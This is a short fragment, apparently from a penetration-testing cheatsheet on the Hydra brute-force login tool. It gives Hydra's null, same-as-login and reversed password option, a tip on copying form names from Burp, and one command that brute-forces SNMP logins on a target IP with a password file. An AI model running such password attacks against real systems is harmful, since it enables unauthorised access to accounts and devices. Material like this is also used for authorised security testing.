7RU7H/Archive/Tools/Bruteforce-Login-Tools/Hydra-Cheatsheet.md

 -e nsr    try "n" null password, "s" login as pass and/or "r" reversed login
 ```

+- Using burp to capture a request and copying and pasting the form names into the command line avoid silly mistakes that are time costly
 ```bash
 # Command 								Description:
 hydra -P password-file.txt -v $ip snmp 					# Hydra brute force against SNMP